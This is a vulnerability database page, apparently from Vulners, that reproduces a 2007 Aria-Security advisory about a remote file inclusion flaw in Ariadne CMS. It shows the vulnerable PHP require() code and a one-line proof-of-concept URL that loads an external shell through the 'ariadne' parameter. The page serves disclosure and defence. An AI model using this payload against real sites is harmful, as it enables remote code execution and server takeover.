Lucene search
K

ariadnecms-rfi.txt

🗓️ 08 Aug 2007 00:00:00Reported by aria-security.netType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Ariadne CMS has a Remote File Inclusion vulnerability allowing exploit via crafted URLs.

Code
`_________________________  
  
A R I A - S E C U R I T Y  
_________________________  
  
Ariadne CMS Remote File Inclusion  
Vendor: http://www.ariadne-cms.org/  
  
  
Source Code:  
  
  
<?php  
require("./ariadne.inc");  
require($ariadne."/configs/ariadne.phtml");  
  
$PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];  
?>  
<html>  
<head>  
<script>  
function LoadingDone() {  
parent.LoadingDone();  
}  
  
  
PoC:  
http://site.com/path/view.php?ariadne=SHELL?  
  
  
  
  
  
Credits: Aria-Security Team  
http://Aria-Security.net  
http://outlaw.aria-security.info  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation